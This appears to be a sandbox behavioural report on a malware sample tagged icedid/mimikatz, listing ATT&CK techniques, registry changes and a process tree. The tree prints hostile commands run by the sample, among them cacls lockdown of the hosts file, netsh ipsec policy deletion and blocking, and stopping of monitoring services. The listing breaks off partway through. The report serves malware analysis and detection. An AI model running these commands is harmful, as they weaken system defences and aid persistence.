Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

wpcap.exenet.exenetsh.exebbsetityz.exenetsh.exenet.execmd.execmd.exeschtasks.exenetsh.exenet1.exenet1.exenet1.execmd.execacls.exePING.EXEcmd.exenetsh.execmd.execmd.exenet1.exepujbqc.execmd.exevinqltqet.exeschtasks.exenetsh.exenetsh.execmd.exenet.exesc.execmd.execmd.exenet.exesc.exesc.execmd.execmd.execmd.execmd.exenetsh.exenetsh.exenet.execmd.exepyismeq.exenetsh.exenet1.exenet1.exenetsh.exenetsh.exenet1.execacls.execacls.exenet.exenet.exenetsh.execmd.exenetsh.execmd.exexohudmc.execacls.execmd.exenetsh.exenetsh.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bbsetityz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pujbqc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vinqltqet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyismeq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEcmd.exe

pid	Process
1748	PING.EXE
4192	cmd.exe

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023459-6.dat	nsis_installer_2
behavioral2/files/0x0008000000023470-15.dat	nsis_installer_1
behavioral2/files/0x0008000000023470-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

Processes:

eyifeiqae.exepyismeq.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	pyismeq.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	pyismeq.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	pyismeq.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	pyismeq.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	pyismeq.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	pyismeq.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	eyifeiqae.exe

Modifies registry class 14 IoCs

Processes:

pyismeq.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	pyismeq.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
1748	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
408	schtasks.exe
1468	schtasks.exe
1596	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pyismeq.exe

pid	Process
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe

Suspicious behavior: LoadsDriver 15 IoCs

Processes:

pid	Process
660
660
660
660
660
660
660
660
660
660
660
660
660
660
660

Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe

pid	Process
3004	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exepyismeq.exepyismeq.exevfshost.exeeyifeiqae.exefsfese.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exe

description	pid	Process
Token: SeDebugPrivilege	3004	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	4992	pyismeq.exe
Token: SeDebugPrivilege	1448	pyismeq.exe
Token: SeDebugPrivilege	4692	vfshost.exe
Token: SeDebugPrivilege	2904	eyifeiqae.exe
Token: SeLockMemoryPrivilege	1700	fsfese.exe
Token: SeLockMemoryPrivilege	1700	fsfese.exe
Token: SeDebugPrivilege	1400	eyifeiqae.exe
Token: SeDebugPrivilege	2324	eyifeiqae.exe
Token: SeDebugPrivilege	2916	eyifeiqae.exe
Token: SeDebugPrivilege	3432	eyifeiqae.exe
Token: SeDebugPrivilege	4764	eyifeiqae.exe
Token: SeDebugPrivilege	2240	eyifeiqae.exe
Token: SeDebugPrivilege	4596	eyifeiqae.exe
Token: SeDebugPrivilege	2288	eyifeiqae.exe
Token: SeDebugPrivilege	1748	eyifeiqae.exe
Token: SeDebugPrivilege	1656	eyifeiqae.exe
Token: SeDebugPrivilege	4384	eyifeiqae.exe
Token: SeDebugPrivilege	2788	eyifeiqae.exe
Token: SeDebugPrivilege	1080	eyifeiqae.exe
Token: SeDebugPrivilege	1672	eyifeiqae.exe
Token: SeDebugPrivilege	4720	eyifeiqae.exe
Token: SeDebugPrivilege	2712	eyifeiqae.exe
Token: SeDebugPrivilege	528	eyifeiqae.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exepyismeq.exepyismeq.exexohudmc.exepujbqc.exepyismeq.exepyismeq.exe

pid	Process
3004	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe
3004	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe
4992	pyismeq.exe
4992	pyismeq.exe
1448	pyismeq.exe
1448	pyismeq.exe
3088	xohudmc.exe
1476	pujbqc.exe
4708	pyismeq.exe
4708	pyismeq.exe
220	pyismeq.exe
220	pyismeq.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.execmd.exepyismeq.execmd.execmd.exewpcap.exenet.exenet.exenet.exe

description	pid	Process	procid_target
PID 3004 wrote to memory of 4192	3004	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe	82
PID 3004 wrote to memory of 4192	3004	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe	82
PID 3004 wrote to memory of 4192	3004	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe	82
PID 4192 wrote to memory of 1748	4192	cmd.exe	84
PID 4192 wrote to memory of 1748	4192	cmd.exe	84
PID 4192 wrote to memory of 1748	4192	cmd.exe	84
PID 4192 wrote to memory of 4992	4192	cmd.exe	85
PID 4192 wrote to memory of 4992	4192	cmd.exe	85
PID 4192 wrote to memory of 4992	4192	cmd.exe	85
PID 1448 wrote to memory of 4824	1448	pyismeq.exe	87
PID 1448 wrote to memory of 4824	1448	pyismeq.exe	87
PID 1448 wrote to memory of 4824	1448	pyismeq.exe	87
PID 4824 wrote to memory of 5096	4824	cmd.exe	89
PID 4824 wrote to memory of 5096	4824	cmd.exe	89
PID 4824 wrote to memory of 5096	4824	cmd.exe	89
PID 4824 wrote to memory of 4384	4824	cmd.exe	90
PID 4824 wrote to memory of 4384	4824	cmd.exe	90
PID 4824 wrote to memory of 4384	4824	cmd.exe	90
PID 4824 wrote to memory of 1828	4824	cmd.exe	91
PID 4824 wrote to memory of 1828	4824	cmd.exe	91
PID 4824 wrote to memory of 1828	4824	cmd.exe	91
PID 4824 wrote to memory of 3756	4824	cmd.exe	92
PID 4824 wrote to memory of 3756	4824	cmd.exe	92
PID 4824 wrote to memory of 3756	4824	cmd.exe	92
PID 4824 wrote to memory of 4984	4824	cmd.exe	93
PID 4824 wrote to memory of 4984	4824	cmd.exe	93
PID 4824 wrote to memory of 4984	4824	cmd.exe	93
PID 4824 wrote to memory of 644	4824	cmd.exe	94
PID 4824 wrote to memory of 644	4824	cmd.exe	94
PID 4824 wrote to memory of 644	4824	cmd.exe	94
PID 1448 wrote to memory of 1656	1448	pyismeq.exe	102
PID 1448 wrote to memory of 1656	1448	pyismeq.exe	102
PID 1448 wrote to memory of 1656	1448	pyismeq.exe	102
PID 1448 wrote to memory of 2064	1448	pyismeq.exe	104
PID 1448 wrote to memory of 2064	1448	pyismeq.exe	104
PID 1448 wrote to memory of 2064	1448	pyismeq.exe	104
PID 1448 wrote to memory of 3488	1448	pyismeq.exe	106
PID 1448 wrote to memory of 3488	1448	pyismeq.exe	106
PID 1448 wrote to memory of 3488	1448	pyismeq.exe	106
PID 1448 wrote to memory of 2488	1448	pyismeq.exe	110
PID 1448 wrote to memory of 2488	1448	pyismeq.exe	110
PID 1448 wrote to memory of 2488	1448	pyismeq.exe	110
PID 2488 wrote to memory of 4056	2488	cmd.exe	112
PID 2488 wrote to memory of 4056	2488	cmd.exe	112
PID 2488 wrote to memory of 4056	2488	cmd.exe	112
PID 4056 wrote to memory of 4468	4056	wpcap.exe	113
PID 4056 wrote to memory of 4468	4056	wpcap.exe	113
PID 4056 wrote to memory of 4468	4056	wpcap.exe	113
PID 4468 wrote to memory of 4060	4468	net.exe	115
PID 4468 wrote to memory of 4060	4468	net.exe	115
PID 4468 wrote to memory of 4060	4468	net.exe	115
PID 4056 wrote to memory of 3596	4056	wpcap.exe	116
PID 4056 wrote to memory of 3596	4056	wpcap.exe	116
PID 4056 wrote to memory of 3596	4056	wpcap.exe	116
PID 3596 wrote to memory of 2256	3596	net.exe	118
PID 3596 wrote to memory of 2256	3596	net.exe	118
PID 3596 wrote to memory of 2256	3596	net.exe	118
PID 4056 wrote to memory of 2112	4056	wpcap.exe	119
PID 4056 wrote to memory of 2112	4056	wpcap.exe	119
PID 4056 wrote to memory of 2112	4056	wpcap.exe	119
PID 2112 wrote to memory of 1504	2112	net.exe	121
PID 2112 wrote to memory of 1504	2112	net.exe	121
PID 2112 wrote to memory of 1504	2112	net.exe	121
PID 4056 wrote to memory of 1652	4056	wpcap.exe	122

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1692
- C:\Windows\TEMP\sksiiubel\fsfese.exe
  "C:\Windows\TEMP\sksiiubel\fsfese.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1700

C:\Users\Admin\AppData\Local\Temp\2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nfbznfkt\pyismeq.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4192
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1748
- - C:\Windows\nfbznfkt\pyismeq.exe
    C:\Windows\nfbznfkt\pyismeq.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4992

C:\Windows\nfbznfkt\pyismeq.exe
C:\Windows\nfbznfkt\pyismeq.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5096
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1656
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2064
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mvibprbre\meetrtrln\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\mvibprbre\meetrtrln\wpcap.exe
    C:\Windows\mvibprbre\meetrtrln\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4468
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4060
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3596
